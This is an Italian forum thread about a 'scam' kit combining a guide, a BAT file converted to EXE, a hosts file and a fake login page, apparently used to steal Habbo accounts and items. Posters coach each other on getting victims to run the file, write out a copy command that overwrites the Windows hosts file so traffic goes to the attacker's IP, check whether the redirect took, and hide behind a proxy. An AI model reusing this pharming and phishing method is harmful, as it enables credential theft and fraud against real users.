Release [Guida + BAT + EXE + Hosts + Fake Login] Scam

Alberto sei un grande ottima guida ho capito perchè a me non funzionava...
Perchè io alla vittima non gli facevo mettere i due file sul desktop..
Cmq c'è un modo per farlo funzionare anke se non è sul desktop?

p&b ma a te si vede dal tuo computer il tuo ip??poi lo scrivi in indirizzi e ti dà il fake o no?

si, il bat da convertire all'inizio deve avere
copy "Luogo dov'è l'hosts" "C:/WINDOWS/system32/drivers/etc

spiegati meglio perfavore ;)

non stavo dicendo a te

cmq credo ke avere un ip dinamico serve solo x non farti scoprire mentre rubi i furni di un habbo xo in quel caso servirebbe un proxy non un ip dinamico nn so proprio ke fare x aiutarti mi disp, kiedi ai piu esperti di me

Io comunque ho seguito le istruzioni e ho creato comunque l'archivio cn l'exe e gli host...cm faccio a vedere se funziona????

alberto, sei online, puoi aiutarci?:help:help

Bhe come nn funziona.. solo per vedere se scrive su hosts.. una volta aperto vai in C:\WINDOWS\system32\drivers\etc\hosts E vedi se ha scritto TUO IP
Perfavore, Entra oppure Registrati per vedere i Link!
se lo ha scritto basta che canelli la stringa ^_^

bhe per un router.. nn saprei perche ovviamente se hai una protezione al tuo router se metti ip la vittima prima di visualizzare la pagina ci uscira un alert dove mettere nome utente e password (cioè tuoi dati di amministrazione router)

bhe per un router.. nn saprei perche ovviamente se hai una protezione al tuo router se metti ip la vittima prima di visualizzare la pagina ci uscira un alert dove mettere nome utente e password (cioè tuoi dati di amministrazione router)

no a me non escono perche io tengo la pelle che si collega a un router...! al mio amico si!